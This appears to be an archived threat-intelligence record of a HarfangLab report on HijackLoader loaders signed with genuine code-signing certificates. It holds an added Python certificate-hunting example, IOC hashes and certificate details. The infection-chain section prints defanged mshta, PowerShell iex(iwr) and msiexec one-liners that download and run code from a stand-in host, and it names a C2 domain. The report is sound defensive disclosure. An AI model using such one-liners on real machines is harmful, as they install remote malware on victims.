{
	"id": "5358bc4a-32fa-495c-9bf9-155d1b2b8ca0",
	"created_at": "2026-04-06T00:20:16.417685Z",
	"updated_at": "2026-04-10T13:11:37.994641Z",
	"deleted_at": null,
	"sha1_hash": "53286663e5a9ac3c4b8c691ba6272ce588b2416f",
	"title": "HijackLoader evolution: abusing genuine signing certificates",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1156817,
	"plain_text": "HijackLoader evolution: abusing genuine signing certificates\r\nPublished: 2024-10-11 · Archived: 2026-04-05 14:49:41 UTC\r\nPublished on 11 October, 2024 16min\r\nSummary\r\nhttps://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\r\nPage 1 of 13\n\nSince mid-September 2024, our telemetry has revealed a significant increase in “Lumma Stealer”1\r\n malware\r\ndeployments via the “HijackLoader”2 malicious loader.\r\nOn October 2, 2024, HarfangLab EDR detected and blocked yet another HijackLoader deployment attempt –\r\nexcept this time, the malware sample was properly signed with a genuine code-signing certificate.\r\nIn response, we initiated a hunt for code-signing certificates (ab)used to sign malware samples. We identified and\r\nreported more of such certificates. This report briefly presents the associated stealer threat, outlines the\r\nmethodology for hunting these certificates, and providees indicators of compromise.\r\nHijackLoader deployment workflow\r\nInfection chain: the fake CAPTCHA campaign\r\nThe so-called “fake CAPTCHA” campaign has already been extensively documented3. 
The overall deployment tactic unfolds as follows:\r\nFigure 1 – Infection chain overview\r\n1) The target visits a malicious website showing a fake CAPTCHA Web page:\r\nFigure 2 – Fake CAPTCHA Web page\r\n2) Upon clicking the “I’m not a robot” button, a pop-up instructs the target to type a series of keyboard shortcuts that open a command line interpreter, then to paste and execute a PowerShell payload which has been automatically copied to the clipboard:\r\nFigure 3 – Path to PowerShell execution\r\n3) As a result of the PowerShell execution, a ZIP archive is downloaded and decompressed, and a binary is executed from it.\r\nStarting mid-September 2024, we identified in our telemetry 3 variants of the PowerShell script used during the second step:\r\nUse of mshta.exe [4]: the script leverages the Microsoft HTML Application Host to execute malicious code from a remote URL. Arbitrary example: mshta hxxps://payload[.]url/tra17\r\nRaw PowerShell with iex (Invoke-Expression) [5]: in this variant, a PowerShell script is directly executed from a remote file. Arbitrary example: iex (iwr hxxps://payload[.]url/a.txt -UseBasicParsing).Content\r\nUse of msiexec.exe [6]: the script employs the Microsoft Windows Installer to silently download and execute a payload from a remote URL. Arbitrary example: C:\\windows\\system32\\msiexec.exe /fv hxxps://payload[.]url/DB2jh /q\r\nHijackLoader execution from DLL sideloading\r\nThe initial ZIP archive samples we analyzed from the aforementioned infection chain contained a DLL sideloading [7] package, which led to HijackLoader execution. This package consists of three components:\r\n1. A legitimate application binary;\r\n2. A malicious sideloaded DLL;\r\n3. An optional additional data file.\r\nFigure 4 – HijackLoader and DLL sideloading\r\nFor most DLL sideloading packages we analyzed, the purpose of the sideloaded HijackLoader DLL is to decrypt and execute an encrypted file provided in the package. This file conceals the final HijackLoader stage, which downloads and executes a stealer implant (Lumma Stealer in our cases).\r\nA wild signed HijackLoader appears!\r\nOn October 2, 2024, HarfangLab EDR detected and blocked a HijackLoader deployment attempt against a customer. We noticed that the executable which triggered the detection (SHA-256: 1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337) was a signed [8] HijackLoader sample, and was not part of a DLL sideloading package:\r\nFigure 5 – Signed HijackLoader detection\r\nAt the time HarfangLab EDR blocked the attempt, and for at least 2 days afterwards, the signed HijackLoader sample was very poorly detected by security products:\r\nFigure 6 – Detection of the signed HijackLoader according to a popular online multiscanner on 2024-10-03 at midnight\r\nThe associated code-signing certificate was revoked between October 3 and 4. Malicious executables signed with this certificate are now properly detected by most security products.\r\nApart from the deployment tactic switching from a DLL sideloading package to a signed binary, the sample’s execution logic is unchanged, and has already been publicly described in several articles [9][10][11]. The command and control (C2) [12] hostname for the signed sample we initially detected (SHA-256: 1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337) is me3ar40.quickworld[.]shop (see Fig. 7).\r\nFigure 7 – HijackLoader C2 hostname\r\nSigned malware samples seem to evade traditional detection methods rather well. For instance, the capture below shows the poor detection rate for another HijackLoader sample (SHA-256: f158c65261bcab6e93927a219d12f596a4e40857bbd379f9889710ea17251e5e) we identified, which impersonates the “Firefox” browser:\r\nFigure 8 – Poor detection rate for a signed HijackLoader sample on 2024-10-09\r\nAs a result, we tried to pivot from the HijackLoader occurrence we detected to identify further abused code-signing certificates.\r\nHunting for more abused code-signing certificates\r\nPivoting from a C2 hostname\r\nIn order to hunt for more abused code-signing certificates, we first looked for signed executables which accessed a URL on a known HijackLoader sample C2 (quickworld.shop):\r\nFigure 9 – Signed malware using the same C2 domain\r\nDoing so, we identified new signed malicious samples, and the abuse of the 2 following code-signing certificates:\r\nName: Lider LLC\r\nValid From: 01:58 PM 06/14/2024\r\nValid To: 01:58 PM 06/15/2025\r\nThumbprint: 2DD67214D7C7274458CFECC78E4B51063869D8E3\r\nSerial Number: 39 DF 1C 6C 0F 51 C5 9F 17 59 CA 59\r\nName: Hangzhou Rongyi Network Technology Co., Ltd.\r\nValid From: 07:50 AM 09/27/2024\r\nValid To: 07:50 AM 09/27/2025\r\nThumbprint: DCC865C6DD9EA2318439F207ACBC2AC0797FB51B\r\nSerial Number: 16 16 F1 4F BA 9C 87 AB 97 AD 25 86 1E E7 A9 DC\r\nWe could then further identify additional samples signed with these certificates, confirm they were malicious, and extract sample data (such as C2 hostnames) to iterate the process with the newly identified domains:\r\nFigure 10 – Hunting for signed malware samples via domain names\r\nThanks to this technique we 
identified a third abused code-signing certificate.\r\nName: Shanghai Yungpu Chemical Co., Ltd.\r\nValid From: 04:20 PM 09/19/2024\r\nValid To: 08:06 AM 09/19/2025\r\nThumbprint: FDD829D3B46933EF8015B70B6C3FCE6BA9675578\r\nSerial Number: 69 1C 41 0E 33 DD F6 44 08 6F A2 41 10 7B 64 6E\r\nPivoting from samples metadata\r\nWe checked the metadata of malicious binaries (copyright, original name, description, etc.) and noticed that some of it was not only reused across several malicious samples, but also copied from legitimate software. For instance, some malicious samples (e.g. SHA-256: ff946f48f6bdf33d31f39614909115fead505c16426411897bd8e48362017d31) impersonate the metadata of the legitimate “Wise Folder Hider” tool:\r\nFigure 11 – Executable binary metadata\r\nWe leveraged this legitimate metadata impersonation to identify more malicious samples and abused code-signing certificates, according to the following heuristics (see Fig. 12):\r\n1. If the original legitimate software from which the metadata is copied is NOT signed, then any signed binary reusing its metadata is deemed suspicious.\r\n2. If the original legitimate software is signed, then any binary reusing its metadata but signed with a different certificate is deemed suspicious.\r\nFigure 12 – Identifying newly signed malware via metadata\r\nWe analyzed suspicious samples to confirm they were malicious, and iterated over the previously described hunting loop from confirmed malicious samples. 
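The hunting loop described in the two pivoting sections above (seed sample → abused certificate and C2 domain → further signed samples, plus the two metadata heuristics, repeated until nothing new is confirmed) is written out below as the general algorithm. This is an added example, not HarfangLab’s tooling: the sample IDs, the TP-* thumbprints, the legitimate-software table, the analyst verdicts and every host except the C2 the report names are constructed placeholders, and S1 merely stands in for the detected signed sample.

```python
# Added example (not HarfangLab tooling): the certificate-hunting loop described above,
# run over a constructed sample set. Sample IDs, TP-* thumbprints, the legitimate-software
# table and every host except the C2 the report names are placeholders for the demo.

def registered_domain(host):
    # Collapse a hostname to its registrable domain (approximated as the last two labels)
    # so that me3ar40.quickworld.shop and cdn.quickworld.shop pivot together.
    return '.'.join(host.lower().split('.')[-2:])


# Constructed: (OriginalFilename, CompanyName) of a legitimate product -> thumbprint of the
# vendor's own signing certificate, or None when the product ships unsigned.
LEGIT_SOFTWARE = {
    ('FolderTool.exe', 'Example Tools'): None,
    ('browser.exe', 'Example Browser Corp'): 'TP-BROWSER',
}

# Constructed telemetry: signer thumbprint (None if unsigned), hosts contacted, and the PE
# version-info pair. S1 stands in for the signed HijackLoader the report detected.
SAMPLES = {
    'S1': {'signer': 'TP-ACIRA', 'c2': {'me3ar40.quickworld.shop'}, 'meta': ('Updater.exe', 'Acme')},
    'S2': {'signer': 'TP-LIDER', 'c2': {'cdn.quickworld.shop'}, 'meta': ('Setup.exe', 'Acme')},
    'S3': {'signer': 'TP-RONGYI', 'c2': {'quickworld.shop', 'other.example'}, 'meta': ('Setup.exe', 'Acme')},
    'S4': {'signer': 'TP-YUNGPU', 'c2': {'other.example'}, 'meta': ('Launcher.exe', 'Acme')},
    'S5': {'signer': 'TP-SEVER', 'c2': {'third.example'}, 'meta': ('FolderTool.exe', 'Example Tools')},
    'S6': {'signer': 'TP-TENGYUAN', 'c2': {'third.example'}, 'meta': ('browser.exe', 'Example Browser Corp')},
    'S7': {'signer': 'TP-BROWSER', 'c2': set(), 'meta': ('browser.exe', 'Example Browser Corp')},  # the real browser
    'S8': {'signer': None, 'c2': set(), 'meta': ('FolderTool.exe', 'Example Tools')},  # the real, unsigned tool
    'S9': {'signer': 'TP-TENGYUAN', 'c2': {'fourth.example'}, 'meta': ('Helper.exe', 'Acme')},
    'S10': {'signer': 'TP-SHARED', 'c2': {'other.example'}, 'meta': ('Sync.exe', 'Acme')},  # benign, shared hosting
}

# Constructed analyst verdicts standing in for the manual confirmation step.
ANALYST_VERDICTS = {'S2': True, 'S3': True, 'S4': True, 'S5': True, 'S6': True, 'S9': True, 'S10': False}


def metadata_suspicious(sample, legit=LEGIT_SOFTWARE):
    # Heuristic 1: the impersonated product is unsigned, yet this binary is signed.
    # Heuristic 2: the product is signed, but this binary carries a different certificate.
    if sample['meta'] not in legit or sample['signer'] is None:
        return False
    vendor_cert = legit[sample['meta']]
    return vendor_cert is None or sample['signer'] != vendor_cert


def hunt(samples, seeds, confirm, legit=LEGIT_SOFTWARE):
    confirmed, rejected = set(seeds), set()
    abused_certs, bad_domains = set(), set()
    rounds = 0
    while True:
        rounds += 1
        # Extract pivots (signing certificate, C2 domain) from everything confirmed so far.
        for sid in confirmed:
            s = samples[sid]
            if s['signer']:
                abused_certs.add(s['signer'])
            bad_domains.update(registered_domain(h) for h in s['c2'])
        # Widen the net: same certificate, same C2 domain, or impersonated metadata.
        candidates = set()
        for sid, s in samples.items():
            if sid in confirmed or sid in rejected:
                continue
            if (s['signer'] in abused_certs
                    or any(registered_domain(h) in bad_domains for h in s['c2'])
                    or metadata_suspicious(s, legit)):
                candidates.add(sid)
        # Only analyst-confirmed samples feed the next round; this keeps a benign binary that
        # merely shares a hosting domain from poisoning the pivot set.
        new = {sid for sid in candidates if confirm(sid)}
        rejected |= candidates - new
        if not new:
            return {'confirmed': confirmed, 'abused_certs': abused_certs,
                    'bad_domains': bad_domains, 'rejected': rejected, 'rounds': rounds}
        confirmed |= new


if __name__ == '__main__':
    result = hunt(SAMPLES, {'S1'}, lambda sid: ANALYST_VERDICTS.get(sid, False))
    for key in ('confirmed', 'abused_certs', 'bad_domains', 'rejected'):
        print(key, sorted(result[key]))
```

Starting from S1 alone, the first round pivots on the quickworld.shop domain and the metadata heuristics, the second round pivots on the certificates and domains those confirmed samples brought in, and the third round finds nothing new. S10 is offered as a candidate because it shares a domain, but since analysis rejects it, its certificate never enters the abused set.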
Iterating the loop in this way, we identified 2 additional abused certificates:\r\nName: LLC SEVER\r\nValid From: 07:55 AM 04/24/2024\r\nValid To: 07:55 AM 04/25/2025\r\nThumbprint: 2B20EE6FB83FF52BDD2714741A8783981795B8E7\r\nSerial Number: 6B 7A F8 E1 3E 40 98 A5 07 B6 97 8A\r\nName: Xi'an Tengyuanri Network Technology Co., Ltd.\r\nValid From: 08:18 AM 09/03/2024\r\nValid To: 08:18 AM 09/03/2025\r\nThumbprint: 4B2459E76864532BDB1F00BF909495C96A01F93C\r\nSerial Number: 5C 70 B0 F5 7B 7D 26 ED 72 3E FF AE 43 D6 F4 71\r\nConclusion\r\nOur investigation, initiated by a HarfangLab EDR detection, led to the identification of multiple abused code-signing certificates and associated malicious samples actively used in the wild.\r\nWe reported these abused code-signing certificates to their issuing authorities, which revoked them within hours up to almost a day, enabling proper detection by other security vendors.\r\nWhile we could not reliably determine whether these certificates were stolen or purposefully generated by threat actors, we assess with low to medium confidence that they were likely created deliberately. For several issuing certificate authorities, we noticed that acquiring and activating a code-signing certificate is mostly automated, and only requires a valid company registration number as well as a contact person. All five certificates detailed in the appendix were issued by Extended Validation code-signing CAs (GlobalSign, Certum and SSL.com), so EV status on its own did not distinguish them from legitimately signed software.\r\nThis research underscores that malware can be signed, highlighting that a code signature alone cannot serve as a baseline indicator of trustworthiness. Therefore, it’s crucial to implement several complementary detection tactics, such as monitoring system behaviors and conducting in-memory scanning on endpoints, to protect against the execution of signed malware.\r\nAppendix\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nHashes (SHA-256)\r\nSamples signed by Acira Consulting Inc\r\n0d40a18d67005a5ade12b5593df3cf9e7ae996bebedacad64de81de3ffb9821a\r\n137a54acfc324a120335bd1b9a397cb5fd7e7709b0980ac3eaeb03fa7764f259\r\n17926b988b31296c26bf8fcc5be5595f8b290112949cd9314b3ddb51216a9fc6\r\n1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337\r\n20cfcd8c67b83b282e3aac028a166539a26d44129c9860ea7464feed5a123818\r\n27ed09b6bbce8c6306640adf76d6dd1f3b97c406915d72b215165fe1c5615ac7\r\n315615abe0592af8ae3c90b6ad3b18047084612b49699a6f26eafe1dc747d773\r\n365ed11bf82a3f59768195ab7971b6955ec0ab883b5e800c63339a4105bdec95\r\n39551715b734f4a331dd0b39a953a79567f642dc38bfa173f9849a4dbdd7d34e\r\n3d2f989bf5887b1dbbfbb0030ed0e4c304dd0e6123a1e10e798ee3eb10c87f8b\r\n402aacbb8dc07d96733eee2292f709d89d65efbe82d55e0dd4b7764cdde287b5\r\n40e21047850b9645143ac1febe703de2be9b6c9dc684840bebb61b09a0725a85\r\n4be6e60d9880611a354d4c4c3097733fd7ce4812c40e7a4fc9e8fca569f329f6\r\n5c019e25c46cc13a4bc05ccacf2b783f9435bed724ae945d1508c69f3490a617\r\n649ec4858e572e0145e35a9faa712708949b7bb1bce1594154cda580d80a0ca9\r\n6c58e8c3b998614567b4584cffc148e2382727997a754db68aa310881c2a5ba0\r\n7085f5baff8a1f39a4baf11b650aad21454eef8b0afd13f9c4338fed86b99785\r\n75da403841e014243fce87a1b666e02388c99fb96135e7c6fe5523ce2f51a5ca\r\n970f0e2741f072e9b3c0fb5059e1d5610a8b53f50be65992a210884439c5643e\r\n9ef8d1845db29a2b4dc9e912e480bfad7e8007c96b1da364a5af123df7e01c29\r\na941faec5a25db96d6258d5c1e6c30f9f18ecf9937b63eb687b4d71a0af871f0\r\nbdd338ff606d1e08ec16d13fbc5dee1e404ad2ae857a70e81bb23888beabf63a\r\nbe03aa927c5d0d61ec21af9227f48e8c4d44c696c46f275bf7510998311912e8\r\nd465588501d2882d1a223516c4f66bcc44ea7211245fd49b9e61a64f94831614\r\ne13aa5f31d2469fc4db4e54af711035ea79f63be591c0460982c0b6baf08e649\r\nfcb54e221a021ff3d57c52366169a13f86bed4c16d7e5bbddbfb6a315dc7bf3f\r\nff946f48f6bdf33d31f39614909115fead505c16426411897bd8e48362017d31\r\nSamples signed by Xi’an Tengyuanri Network Technology Co\r\nfa6e61f845c06cb9075806cfc8cb8ed7e1ca7dc956cce5eafbe99babf85d9e66\r\n7c78454c853838a863c7a112e2c726e2b98d292906c73a1fa09b03cf421a5966\r\n5fac3606d6153531218a608ae5cb3f40f2421a41b18b0d58f3f7fdb56366732d\r\n3450b57ff0d7f8cd7f14258d1e0e851487b5beac599a024f91f31c15e9deb075\r\nSamples signed by Shanghai Yungpu Chemical Co\r\nfecd6fc43e5198b7b4427c1e23cd62ca97820da25d2bdba67bd29b3d0f100fa5\r\nfad1bf61d38d750f341cdc09174af3c2d4368b19db62171bc5d7be6401eb8c00\r\nfaa45f2433a8da9a57c6a876779638fb14037d56e93ae85297fea7517be501f2\r\nf4350182d9a117138e47ce4622b3aa1ac9ebf2583f4932a6da78ea2ed7511a7f\r\nf158c65261bcab6e93927a219d12f596a4e40857bbd379f9889710ea17251e5e\r\nc78b8771a5b897c03008c09241fdb07160264858f49c7398f9db681fc2003971\r\n81755e2da9fcc33dcd423c30a0ad4f9147b54dc1880721247631b34c31071de7\r\n7d676c9ef817e55701ab3050a6bbde7d0fb8aa251c09779662c514c7f87875cc\r\n6e0c83627427e5ec9c30569a851cc72cc003ea1c7ee182db3e4dae9392285a7b\r\n6a3095d572991c4943f7a27dff4798d3b5286280115f7fab77a0a472ca0abdd9\r\n68242a96e0283db31f7a68f6e26df99e1a27fef1f1f9d732f0ddd0b8663ba3c6\r\n11a6ee07c004d8c7469a9cf30b9b084ea786613a5481fcdf78ce5a2634ad2f02\r\n04675527ea934ff3450cf20900b7233a8a86125b5f3042d97d3a6e349631f307\r\nSamples signed by LLC SEVER\r\nfa58891a232e236bfde9d6103007624f0e83e17a9377bf4ac86af4bd087270d7\r\ne02025280e22b826ab8997e2545406bf0c31e497f059155dc8412c34c8bad859\r\nd948e07325a1cf48bb9749e3f0a83d69c4abb96f822e3002b31b752ebb292c77\r\nc6e595d44257f293200b926123cea0f3cdbd622b32226758e907f9829d652833\r\nbe0644373ab939d3e3d1766927039876b4c3511258dd5ecf3cb75f1dab5ac324\r\n8552afefa1cdcfe5889cf01bfae140e341c5bfb03188e65a45d2c8d90520e11e\r\n81fa2b7bd9d726d239b08595d1445efaa697ef45761551b966c3a3930288952d\r\n6abb9de7f6c663e542cd3d7b481b0907566f8c2acdacc6178091dacc7891d2b2\r\n5ed854b4ed07250521f0da12b810128b014b2c6e83b8ba51b80dfa9e4252a3bf\r\n34fea0c0708ecfceb592029910626ca699fb5f18595599d47a9ec87749940884\r\n315e6d1736e2ec8465a172d289a6520ec127e1b02190716b383226275672170b\r\n26ab5cf8df71135baf2661864f7d5a62262688a018f7450c5de962433c2b99c9\r\nSamples signed by Lider LLC\r\ne72b171c1383bda2f72ad0e5cdcab833d1488c143ad9386b290d44cb2d67e702\r\ne4536f1dc62b6bae30e6da53cece729820bb27891a020b6a6cf7c4fe566f15a4\r\nd022c579f3619b23b74fa31b6241feb542bf089cb52609256894da08f787d2f3\r\nc73b23798aa9785f2e593db8ced278e0c325e4cb545bb9c8f9004165bd983b6d\r\na95276bc7b7474384166232e0ebe86a5e40ed6d1cdd103794b3b5af107a3eee3\r\n5e450445b628d7c1a4c31e8bb6c951e24e0a0347660eccca6d851477462a0fd4\r\n25c2c9648b5be95c0a61f043f2a9e5703373c3831edbe8cc8b7c857b405f172a\r\n174432fd986530d149a229fa4cfbb0bfe19fc9a6a52efd405a5da02c90a7f9fd\r\nSamples signed by Hangzhou Rongyi Network Technology Co\r\nc20e98a4190f9063f9181d8d9fc01bb89e4e56cb888d4d8883c593586ff52a09\r\n7544df9edd35749e132b8f586cef88127dcbea491ab128271fc3b2abd94e01d5\r\n25e0344b3c4d17a34f59423d45c5e95015ac347e0040e51b2d5df81f3b8ceb83\r\n23a229c4b053f26ed5303447c17edf0ee6b02535692a558e158b3b03087bec87\r\n0c8f2c06eaba300751add819f419458b06acaea47b8b5983fab710a67a074873\r\n0a6df5fb902be0b4b0ed9bfb4f53df4ab54391458a7d8833d524d16d46b33f33\r\nAbused code-signing certificates details\r\nName: Lider LLC\r\nIssuer: GlobalSign GCC R45 EV CodeSigning CA 2020\r\nValid From: 01:58 PM 06/14/2024\r\nValid To: 01:58 PM 06/15/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: 2DD67214D7C7274458CFECC78E4B51063869D8E3\r\nSerial Number: 39 DF 1C 6C 0F 51 C5 9F 17 59 CA 59\r\nName: Hangzhou Rongyi Network Technology Co., Ltd.\r\nIssuer: Certum Extended Validation Code Signing 2021 CA\r\nValid From: 07:50 AM 09/27/2024\r\nValid To: 07:50 AM 09/27/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: DCC865C6DD9EA2318439F207ACBC2AC0797FB51B\r\nSerial Number: 16 16 F1 4F BA 9C 87 AB 97 AD 25 86 1E E7 A9 DC\r\nName: Shanghai Yungpu Chemical Co., Ltd.\r\nIssuer: SSL.com EV Code Signing Intermediate CA RSA R3\r\nValid From: 04:20 PM 09/19/2024\r\nValid To: 08:06 AM 09/19/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: FDD829D3B46933EF8015B70B6C3FCE6BA9675578\r\nSerial Number: 69 1C 41 0E 33 DD F6 44 08 6F A2 41 10 7B 64 6E\r\nName: LLC SEVER\r\nIssuer: GlobalSign GCC R45 EV CodeSigning CA 2020\r\nValid From: 07:55 AM 04/24/2024\r\nValid To: 07:55 AM 04/25/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: 2B20EE6FB83FF52BDD2714741A8783981795B8E7\r\nSerial Number: 6B 7A F8 E1 3E 40 98 A5 07 B6 97 8A\r\nName: Xi'an Tengyuanri Network Technology Co., Ltd.\r\nIssuer: Certum Extended Validation Code Signing 2021 CA\r\nValid From: 08:18 AM 09/03/2024\r\nValid To: 08:18 AM 09/03/2025\r\nValid Usage: Code Signing\r\nAlgorithm: sha256RSA\r\nThumbprint: 4B2459E76864532BDB1F00BF909495C96A01F93C\r\nSerial Number: 5C 70 B0 F5 7B 7D 26 ED 72 3E FF AE 43 D6 F4 71\r\nSource: https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/"
	],
	"report_names": [
		"hijackloader-abusing-genuine-certificates"
	],
	"threat_actors": [],
	"ts_created_at": 1775434816,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/53286663e5a9ac3c4b8c691ba6272ce588b2416f.pdf",
		"text": "https://archive.orkl.eu/53286663e5a9ac3c4b8c691ba6272ce588b2416f.txt",
		"img": "https://archive.orkl.eu/53286663e5a9ac3c4b8c691ba6272ce588b2416f.jpg"
	}
}